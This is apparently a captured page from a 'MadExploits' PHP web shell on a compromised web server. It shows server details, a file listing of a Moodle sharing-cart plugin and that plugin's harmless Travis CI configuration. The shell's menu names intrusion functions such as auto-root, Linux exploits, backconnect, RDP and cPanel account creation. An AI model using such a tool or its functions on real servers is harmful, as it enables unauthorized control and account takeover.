Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.165
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
blocks /
sharing_cart /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.travis.yml
1.33
KB
-rw-r--r--
README.md
13.03
KB
-rw-r--r--
block_sharing_cart.php
7.47
KB
-rw-r--r--
bulkdelete.php
5.03
KB
-rw-r--r--
custom.css
3.78
KB
-rw-r--r--
lib.php
1.16
KB
-rw-r--r--
rest.php
4.65
KB
-rw-r--r--
restore.php
4.36
KB
-rw-r--r--
script.js
42.2
KB
-rw-r--r--
settings.php
2.3
KB
-rw-r--r--
styles.css
2.71
KB
-rw-r--r--
version.php
1.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
language: php sudo: false servics: - mysql addons: firefox: "47.0.1" apt: packages: - openjdk-8-jre-headless cache: directories: - $HOME/.composer/cache - $HOME/.npm php: - 7.2 - 7.3 - 7.4 env: global: - IGNORE_PATHS=db/upgrade.php,classes/form/duration.php,classes/form/itemspertime.php matrix: - MOODLE_BRANCH=MOODLE_36_STABLE DB=mysqli - MOODLE_BRANCH=MOODLE_37_STABLE DB=mysqli - MOODLE_BRANCH=MOODLE_38_STABLE DB=mysqli - MOODLE_BRANCH=MOODLE_39_STABLE DB=mysqli - MOODLE_BRANCH=master DB=mysqli # Ignore PHP 7.4 with MOODLE_36_STABLE & MOODLE_37_STABLE since they contain deprecated code when using PHP 7.4 or higher matrix: exclude: - php: 7.4 env: MOODLE_BRANCH=MOODLE_36_STABLE DB=mysqli - php: 7.4 env: MOODLE_BRANCH=MOODLE_37_STABLE DB=mysqli allow_failures: - env: MOODLE_BRANCH=master DB=mysqli before_install: - phpenv config-rm xdebug.ini - | if [ "${MOODLE_BRANCH}" = "MOODLE_36_STABLE" ]; then nvm install 8.9 nvm use 8.9 else nvm install 14.6.0 nvm use 14.6.0 fi - cd ../.. - composer create-project -n --no-dev --prefer-dist blackboard-open-source/moodle-plugin-ci ci ^2 - export PATH="$(cd ci/bin; pwd):$(cd ci/vendor/bin; pwd):$PATH" install: - moodle-plugin-ci install script: - moodle-plugin-ci phpunit
Close